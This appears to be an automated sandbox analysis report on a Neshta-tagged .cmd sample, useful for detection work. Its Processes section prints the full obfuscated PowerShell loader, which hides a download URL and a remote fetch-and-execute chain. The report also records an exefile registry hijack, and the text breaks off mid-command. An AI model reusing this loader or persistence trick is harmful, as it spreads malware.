Malware Analysis Report

2024-09-11 03:08

Sample ID 240524-bhme9afh44
Target 320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9.cmd
SHA256 320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9
Tags
neshta execution persistence spyware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK Matrix

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9

Threat Level: Known bad

The file 320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9.cmd was found to be: Known bad.

Malicious Activity Summary

neshta execution persistence spyware

Neshta

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Loads dropped DLL

Modifies system executable filetype association

Suspicious use of NtCreateThreadExHideFromDebugger

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Drops file in Program Files directory

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

MITRE ATT&CK Matrix V13

Initial Access
TA0001
Execution
TA0002
Command and Scripting Interpreter
T1059
PowerShell
T1059.001
Persistence
TA0003
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Privilege Escalation
TA0004
Event Triggered Execution
T1546
Change Default File Association
T1546.001
Defense Evasion
TA0005
Modify Registry
T1112
Credential Access
TA0006
Discovery
TA0007
Lateral Movement
TA0008
Collection
TA0009
Exfiltration
TA0010
Command and Control
TA0011
Impact
TA0040
Resource Development
TA0042
Reconnaissance
TA0043

Analysis: static1

Detonation Overview

Reported

2024-05-24 01:08

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-24 01:08

Reported

2024-05-24 01:11

Platform

win7-20240221-en

Max time kernel

130s

Max time network

134s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9.cmd"

Signatures

Neshta

persistence spyware neshta

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Modifies system executable filetype association

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2808 set thread context of 1940 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\FLTLDR.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\LICLUA.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\Oarpmany.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\DISABL~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\1033\ONELEV.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~2\ACCESS~1\wordpad.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\MSInfo\msinfo32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\GROOVEMN.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSOUC.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~1\wabmig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\Adobe\Updater6\ADOBEU~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\MSOICONS.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~3.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\WMPDMC.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\ADOBEC~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSOSYNC.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\PPTICO.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{57A73~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOF5E2~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ielowutil.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\iexplore.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\misc.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\ONENOTEM.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~4.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GO664E~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOBD5D~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\MAINTE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmprph.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\Eula.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\Setup.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\GRAPH.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\XLICONS.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmpshare.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\INTERN~1\ieinstal.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\CNFNOT32.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\NAMECO~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MOZILL~1\UNINST~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\A3DUTI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\LOGTRA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\BCSSync.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSQRY32.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\MSTORE.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WINDOW~1\WinMail.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{4D8DC~1\VC_RED~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\OIS.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\WORDICON.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmlaunch.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\WI54FB~1\wmpconfig.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{CA675~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\AcroRd32.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\OFFICE14\OFFICE~1\ODeploy.exe C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\SOURCE~1\OSE.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\ACCICONS.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\IECONT~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\ONENOTE.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~3\PACKAG~1\{33D1F~1\VCREDI~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Reader\ACROBR~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Adobe\READER~1.0\Resource\Icons\SC_REA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\ADOBEA~1\Versions\1.0\ADOBEA~1.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\COMMON~1\MICROS~1\DW\DW20.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\Google\Update\1336~1.151\GOOGLE~2.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\CLVIEW.EXE C:\Program Files (x86)\windows mail\wab.exe N/A
File opened for modification C:\PROGRA~2\MICROS~1\Office14\VPREVIEW.EXE C:\Program Files (x86)\windows mail\wab.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\svchost.com C:\Program Files (x86)\windows mail\wab.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\exefile\shell\open\command\ = "C:\\Windows\\svchost.com \"%1\" %*" C:\Program Files (x86)\windows mail\wab.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1612 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1612 wrote to memory of 2240 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2240 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2240 wrote to memory of 3020 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 2240 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2240 wrote to memory of 2808 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
PID 2808 wrote to memory of 540 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 540 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 540 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 540 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\cmd.exe
PID 2808 wrote to memory of 1940 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2808 wrote to memory of 1940 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2808 wrote to memory of 1940 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2808 wrote to memory of 1940 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2808 wrote to memory of 1940 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe
PID 2808 wrote to memory of 1940 N/A C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe C:\Program Files (x86)\windows mail\wab.exe

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\320f6b10cd2c34a8bb6387e19f19746f84eeb95e6b5dcae97e7c78b47782ade9.cmd"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -windowstyle hidden "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.maizeoliaUn,ttbPsalmlPartiyA.phi] ronh=Infra$ GummF ou.se Discrsmuttt PretiCyst lPlur i I,cozRoamsiByzonnMul.igHexah ');$Frugtknudernes=Afvarslingerne 'Torum$SemiwGaxomelT ntauCradlmSikk eCairflLjertiUd.ikk,ncalecupma.JuvelDseptioAtomiwExhilnDkstolalbeioFl nraRgeredLi edF MechiAsh.nlCracceCupri(Kunst$suitcGgestaeSurlin subdeDato r alloa DereeNerv,nD sore Tyve, R dd$LobinSPyritpProterScru.iSubmigNederhReduntBn eb) Mart ';$Spright=$Mbelfabrikant[0];Delhed (Afvarslingerne ' Krs,$ProkugmouselIngenoCapesbCharaa burrl Cons:ForldRKundenNazitnWhimseAwakabLavi.rde.latAnielr Recc=s,ces( MonoTKr ste Spios SjuntVivis- VestP Syn aKaraktWe nahAtomb Fortr$ emnoSV.lkypRefr.r S,ppiOvertg On,uhHissettran.)Te.ze ');while (!$Rnnebrtr) {Delhed (Afvarslingerne 'Eurus$Hose gDiaselNot coSuperbSnydeaSeawalStraa: FolkB FernoGha,egOpgrea,ilnan pu.jm Crueetran l Ran.dSuperelignirHemateLobeo=Fods $FremftPa,asrmelituNeuroeTipni ') ;Delhed $Frugtknudernes;Delhed (Afvarslingerne 'NonloSOptatt PhilaTwin rSvaletDin.e-UnlanS NonslCit,eeKontoeJou.tpRo nd Trter4Dagsa ');Delhed (Afvarslingerne 'Dyrer$.antogFlop.l Che,o Lo,ebfla.taSlew.lOvert: HarpR SignnundemnD,rrseTopmib underOutletSvredrPos i= Mari( Cho T ,eenePa,losSyvkat,unai- StrmP KlovaStatutTopsehPopu, Idelf$ DdelSRepulpRegrar F.gai Uds.g kohohBl,nkt For.)Hexas ') ;Delhed (Afvarslingerne 'cry t$ Favoglsninl SkiloHamelbSapiea Bo.slR,ubo:,eoliRDrabbeUdsorm AfbreMyth m B.vibTe,areHollor Cheee Le,id vade=Somal$Wh,tegScabblLowesoGalopb Ap.iaSimillOverb: Lim.b PuggaPrewelPhot,l RadiiScintsAvo ctSouleo R guc ProcaDeni rCathod K.eoiRe acobr zegL dporAbortaAggl pEvilsh SeisyFixat+ D,nk+.arqu%Parab$,ndviUOblignHoflemgenn,oUn.ren KontoThreapSogneoEufeml Remai FritzAlpeniP kkenPentagBuler.BambucEnz,moTeanauPrecin patitPh,en ') ;$Generaene=$Unmonopolizing[$Remembered];}$Surmounting=305594;$Spejle=29502;Delhed (Afvarslingerne 'Unlea$GangagEle.tl .edbo RecobBelleaImperlMolti:Em.naC Downr,lagsaF,ikkn Wibei PrimobestagSig.ar BlisasuprapAn,toh Ugebeb,snirPolyg2Terra3 E sk8 haak Fersk=p,ess BadehGCho ieGaloctStift-PauseCUnsamo .nocnMim.stGenfreHateanStikntUnder Tran.$FormaSFor,dpAvissrTr,nsi ,ndegDamiah,ejectTulip ');Delhed (Afvarslingerne 'Super$ CelagravnelCrimeoRivalb Top aNonnolSkalp:MufflEHelulkTrinbsConflp Inv,lA hidoMilied PaukeR,mswrOlietiEnspen EntagCoalasFalla Third=Lat r Lui.[,nmanSArraiy ManisIsl,dtFreemeHovedmConsi.priorC Flabo Fr nnoversv Hd.reVrtsdrSponstGunsl] c.rt:Pagan: Ch tFInlanrme,teokvi kmPresaBAtomia TredsUnfelef,rhe6 Seps4tegniSOut.etGua.frSwa iiphot.nBesgegBegyn(Impor$LinieCRhodor Am ha.estsnStatii MetaoDapplgSupprrCrickaSp ldpIndsmhS,mpleA.tssrSinap2U res3Miner8Dumet)Octup ');Delhed (Afvarslingerne 'Skins$ antigIncurl.owmoo AndebSomatakantelAchil:Phot.S BranuTerkebAshilgCodbaiBarrea Klarn NonptPr pr Conju= nett Env,l[Figu,S,vermySmrsysUndert AmeleAbbedmWindf. R.ndTstraneStalaxSll.rtSimie. elleEFi ennCler c,inisoDyrebdBrnefi,verpnEd,ikgT lsk]Spica:Blas,: spekARereaS Fy iCLini,IGenopI Unr,. B.ldGSoc aeHjordtReproSUdso,tFeudar krmsiTea,snUdgy gNettl(Disp $Ban.oEBearbkoestrs CanoppeliklS.reao elledljer,ean ifrzooksi Huskn Ko tg Emots Vind)Forb, ');Delhed (Afvarslingerne 'Sk.iv$Middagcompul Sindokus.mbVeineaNedg lGer.n:FordyMDyn.loSanktrCoppeeUrinedPriva1Techn6Aflbs2Mot.r=Revol$HunyaSApprouJannebKlagegVenteiRel eaPlanlnNoncatSulte.Po.tis ekstuSisyfb Blegse,tert Yng rUnderiHelbrnRe,segamme.(Etfag$ .pasSSti,lu B.lkr Amstm poloo,ungeuValidnDansktWeldsiOpdatnNon,egIndta,Ther.$ManliS.rosspkavale DiakjBlufflOffeneTilse) a.st ');Delhed $Mored162;"

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe" /c "echo %appdata%\Bridgewards.Hal && echo t"

C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Elektroencefalograms = 1;$Unvacuously='Sub';$Unvacuously+='strin';$Unvacuously+='g';Function Afvarslingerne($corrodentia){$Skrivepapiret=$corrodentia.Length-$Elektroencefalograms;For($Parliaments178=5;$Parliaments178 -lt $Skrivepapiret;$Parliaments178+=6){$Mellemvejs+=$corrodentia.$Unvacuously.Invoke( $Parliaments178, $Elektroencefalograms);}$Mellemvejs;}function Delhed($Jambos){. ($Syresaltet254) ($Jambos);}$Fertilizing=Afvarslingerne 'KodifM BundoGangszAffeciM.gnel KvinlBeboeaI ter/Cata 5M,del.Uddat0.orur Wi.d(TilbaW,eganiDa sonDeprid Bag,o,aubewThermsTildm EkspaN AldeT Mim. pejls1Kopi.0Mmesl. Dia.0 ubb;Sl,mb Fami.WSprogiKurvenV,sos6Rema 4Entsv; onse Tarahx Bo.u6Kaval4 A,ls; tomk Cig.rr appev Satd:Anthr1Udmal2.ipho1Mis,a. Sed.0Sedat),uder Prov.Gdemile StercKopibkOversoU ykk/ F gh2Gutta0 Samm1Fl nc0Grund0skovs1nikke0Srpr,1Rubri Hov.dFParahiRimelr CamoedottofUlceroStrudxKreop/N.rco1Okap,2Klyng1Refrn.U,elv0Amula ';$Deniably=Afvarslingerne 'S.zinUPraissKittee,azumrUnder-WittyASadd,gNick eHyposnF,nget C nd ';$Generaene=Afvarslingerne 'Ra,cehmanubtConvatRainwpStddmsHenre:Garro/kn.ge/kerbew HabiwAcylawV.rso.Colons HumbeRebelnKonsodMungcsTranspSten,aBoaercChomse R in.CreencDi,tooB.ctemmili./ IntrpAdaylrpot.co Dip,/ enlsdVandclCopyi/OvertuHyn.eqBruti2phasc1EndostEmbry8Dokst ';$Barks=Afvarslingerne ' Lini>Kalku ';$Syresaltet254=Afvarslingerne 'SkoldiNeshleN.umexKla p ';$Stereomusik='Goldede';$Tohaandsbetjening = Afvarslingerne 'Klu peRv.dicrejsehMultio Pr,e samme% Ennoa ennepFr.udpPlanedHor eaMooratWhinnaZyzzy%Bge,g\Val dBt.ftsrRegi,iGrkerdRevolgUds.uePaschwArcosaCh orrInstrd Rej s Opin.SpotlHunbrua SegmlWarmu Sylle&Klosr&Trinu Fng.eHalfscBaterhCentro nfre BunsetKono, ';Delhed (Afvarslingerne 'An ui$ Sjl.gTil.vlC.oiroGelo,b linda IsaclTeleu:RetsvMPrvkebKnyeneBededlPulv,fOttomaSan,ob Halsrkasini ,ermkledsaaLe.bonPredetdaa.y=Ottin(regracRaggemTragadSni,f Dioe/P onec uth Kono$IndehTAfsvaoPterihDechiaVantaaCopian,malgd A stsBaut,bSh,rteBooketrgre,jAfdeleraspenaktiviMetabnLizarg cal )Sagog ');Delhed (Afvarslingerne 'T,ang$IsvafgOptimlForlao eetsb.uperaMellelIntro:Gal eU ReobnS.edemNavleoUnconn,aabeo,kadepMask ophilalitlliiAd erzNonnei Maninunmo,g Quil=afske$S vsnGShutte Pretn ileeUn apr Cumaa SpageI,ettnKandieKan,i.heptasMisrepVe,trl DagtiOxalatPho o( Road$ SaltBZoodeaTeutorSatsek TabusUnhos) Nond ');$Generaene=$Unmonopolizing[0];$Lommen= (Afvarslingerne ' arti$ Pre.g Lystl Sp,doDime,b SpilaGlatblcys,o:FamilGBaksglkate uSuantmMisreeHomotlI,proiVandlk HenpeTapet=To efNWinkeeSpearwStolt-DyresO stenbGadedjSogneeCamemcMounttDek t RibstSMineryUn.ros Showtbassee VirgmFili,. NonpNIndp eE,strt Impe.slap.WH.ldeeTreckbSti,lCly kelNykalinona,eRosennBangst');$Lommen+=$Mbelfabrikant[1];Delhed ($Lommen);Delhed (Afvarslingerne ',verc$A,rhuG,affllalpinuHannem ind,eskattlJustii DatakB,rfoeCorus.Stin.HHage eCassiaJointd nitheklunsr UnmesSkand[ Over$Ar.ehDSkr.de Job nAb.maizeoliaUn,ttbPsalmlPartiyA.phi] ronh=Infra$ GummF ou.se Discrsmuttt PretiCyst lPlur i I,cozRoamsiByzonnMul.igHexah ');$Frugtknudernes=Afvarslingerne 'Torum$SemiwGaxomelT ntauCradlmSikk eCairflLjertiUd.ikk,ncalecupma.JuvelDseptioAtomiwExhilnDkstolalbeioFl nraRgeredLi edF MechiAsh.nlCracceCupri(Kunst$suitcGgestaeSurlin subdeDato r alloa DereeNerv,nD sore 